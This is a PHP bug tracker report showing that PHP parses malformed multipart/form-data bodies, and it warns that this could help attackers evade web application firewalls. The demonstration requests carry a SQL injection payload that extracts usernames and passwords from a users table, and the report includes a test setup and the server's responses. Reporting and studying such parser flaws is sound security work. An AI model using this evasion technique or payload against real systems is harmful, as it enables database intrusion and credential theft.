|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
Patcheschristian.sewing (last revision 2023-03-13 05:34 UTC by christian dot sewing at db dot com)Pull RequestsHistoryAllCommentsChangesGit/SVN commits
[2023-03-12 01:38 UTC] stas@php.net
-Type: Security
+Type: Bug
[2023-03-13 05:34 UTC] christian dot sewing at db dot com
[2023-05-02 12:23 UTC] kevinsanders at yahoo dot com
[2023-07-22 14:48 UTC] forseobirdawade at gmail dot com
[2023-12-21 08:53 UTC] Komal dot Shah dot ca08 at gmail dot com
[2023-12-21 08:55 UTC] Komal dot Shah dot ca08 at gmail dot com
[2024-04-25 07:40 UTC] growthstarboard at gmail dot com
|
|||||||||||||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Thu Apr 25 16:01:28 2024 UTC |
Description: ------------ PHP passed Incomplete Multipart/form-data that conflicts with the requirements set by the RFC. It can cause WAF evasion. As an example ``` POST / HTTP/1.1 User-Agent: Chrome/104.0.5112.102 Accept: */* Host: 127.0.0.1:5980 Content-Length: 105 Content-Type:multipart/form-data;boundary=boundary --boundary Content-Disposition:name="id 1' union select 1,group_concat(user,0x3a,password) from users # ``` First according to RFC1867 there need a form-data token in Content-Disposition header Then A CRLF token to terminated sub-headers is excpet after Content-Disposition sub-header according to RFC1867 And The closing boundary which required by RFC1521 is also missing. Not to mention that the name paramter have an unclosed quotation mark. According to RFCs. A HTTP Request with multipart/form-data should like this ``` POST / HTTP/1.1 User-Agent: Chrome/104.0.5112.102 Cookie: PHPSESSID=r7kcra0ri3qln9hg7341loh3v7; security=low; Accept: */* Host: 127.0.0.1:5980 Content-Length: 130 Content-Type:multipart/form-data;boundary=boundary --boundary Content-Disposition:form-data;name="id" 1' union select 1,group_concat(user,0x3a,password) from users # --boundary ``` However both of them can be passed by php server. As for SECURITY CONSIDERATIONS. It might be used by attack to bypass WAFs.(we had report this to related WAF vendors) Test script: --------------- We deploy the server behind nginx in php-fpm mode using docker-compose ``` version: '3' services: web: image: nginx:latest ports: - "5980:80" volumes: - ./app:/home/wwwroot/ - ./config/nginx/site.conf:/etc/nginx/conf.d/default.conf networks: - code-network php: image: php:7.4-fpm volumes: - ./app:/home/wwwroot/ networks: - code-network networks: code-network: driver: bridge ``` We've test php version from 5.6-fpm to the latest 8.2-fpm And here is the server side script we used to detect $_POST values ``` <?php var_dump("POST:",$_POST); ``` Expected result: ---------------- HTTP/1.1 200 OK Server: nginx/1.23.3 Date: Fri, 10 Mar 2023 14:37:36 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/7.4.33 Content-Length: 31 string(5) "POST:" array(0) { } Actual result: -------------- HTTP/1.1 200 OK Server: nginx/1.23.3 Date: Fri, 10 Mar 2023 14:32:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/7.4.33 Content-Length: 121 string(5) "POST:" array(1) { ["id"]=> string(63) "1' union select 1,group_concat(user,0x3a,password) from users #" }